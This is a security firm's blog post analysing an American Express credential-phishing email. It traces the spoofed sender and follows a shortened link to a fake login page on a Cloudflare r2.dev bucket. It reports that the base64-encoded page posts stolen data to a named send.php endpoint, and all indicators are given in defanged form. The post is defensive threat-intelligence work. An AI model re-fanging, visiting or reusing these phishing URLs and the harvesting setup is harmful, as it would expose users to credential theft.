Skip to content
Home » News » Unveiling American Express Phishing Scams: MerkleFence Analysis Insights: Part 1

Unveiling American Express Phishing Scams: MerkleFence Analysis Insights: Part 1

Phishing emails have been a persistent threat for quite some time. While the incidence of successful phishing attacks has slightly declined due to increased user education, improved defenses, and use of AI and ML in threat detection and prevention, they remain one of the most popular methods of conducting phishing attacks. It is estimated that 91% of all cyber attacks begin with a phishing email. In 2023, credential phishing was the most common type, with a 67% increase in volume compared to 2022.

Over the past few days, we have been conducting research and gathering threat intelligence from a phishing email forwarded to us by one of our clients. In this expository post, we aim to uncover as much information as possible about the threat actor. This will be part 1 of our findings.

 

The Email

 

Screen capture of the phishing email

There are several red flags in this email. The first one is the email subject.

The subject contains a very urgent tone and claims to be from a well-known financial institution, American Express. It requests immediate action on a supposed security issue to recover a password that was allegedly reset due to a ‘rush call’ from an unknown number. Additionally, the email contains a suspicious link and a very generic greeting.

 

The Investigation

Identifying the sender

The first step was to identify who sent the email. To do that, we used tools like WHOIS and IP lookup to trace the sender’s origin. The From header confirmed that the email is not from American Express but from [email protected].

Research into the secure.net domain revealed that it has been reported by several users for phishing emails.

 

This could mean the sender spoofed the secure.net domain to send the phishing email. This can be supported by the fact that secure.net does not have the necessary email security to prevent such events. One of the critical anti-spoofing controls is a DMARC policy. Without a strong DMARC policy, criminals can send fake emails pretending to come from secure.net. This should also be implemented alongside SPF and DKIM.

 

Analysing links

We utilized VirusTotal to analyze the suspicious link, hxxp[://]t[.]co/L4Ac5oXbSx, provided in the email, in order to detect any potential malware.

 

After analysis, we observed that three security vendors labeled this URL as malicious, specifically for phishing. Subsequently, we utilized a sandbox environment to safely analyze the link provided in the email. It was discovered that this link redirects to a fake login page designed to harvest credentials.

hxxps[://]pub-80848fef826d408b8554076b7c527c58[.]r2[.]dev/blobexpexp[.]HTML

Analyzing this final site using VirusTotal reveals that 14 security vendors flag it as malicious, with most of them identifying it as a phishing threat.

 

To further enhance our analysis, we employed urlscan.io, which indicated that the site was potentially malicious for targeting American Express, a financial institution.

 

The .r2.dev domain name leads us to believe that the site is hosted using Cloudflare’s r2, “a new cloud storage service that allows developers to store large amounts of unstructured data without the costly egress bandwidth fees associated with typical cloud storage services.” As is often the case with new cheap technology, these public buckets are now being abused in various phishing attacks and are now seen in URLs used in phishing emails. The standard URL structure is https://pub-{32 Hexadecimal String}.r2.dev/. Malwarebytes have recently blocked them due to their association with riskware and phishing. On the Cloudflare community forum, a post was posted asking how to report:

 

Upon reviewing the source code of the page, we observed that the phishing page was encoded in base64.

 

Decoding it showed that the collected data was meant to be sent to hxxps[://]kpossa[.]sa[.]com/cgi-bin/america/send[.]php

 

Not much information is available on the domain/address hxxps[://]kpossa[.]sa[.]com/cgi-bin/america/send[.]php other than that it is owned by Newold Digital Inc., a web presence solutions provider based in the US. The company offers solutions such as Domains, Online Marketing, and Hosting.

Preliminary Conclusion

Our preliminary investigations have led us to conclude that the email was a credential harvesting attempt aimed at stealing login credentials for financial accounts from unsuspecting users. If successful, it could have resulted in significant economic loss and identity theft.

 

In part 2 of our research, we will strive to determine the scope of the phishing campaigns, identify potential victims, and outline actions organizations can take to safeguard themselves.

To safeguard yourself and your company against phishing attacks, it’s crucial to educate all employees about the indicators of phishing and establish a transparent reporting process for such attempts. Additionally, it’s imperative to ensure that your company implements email security measures to prevent your domain from being spoofed and used to distribute phishing emails. Protect your organization from phishing threats with MerkleFence. Talk to Us.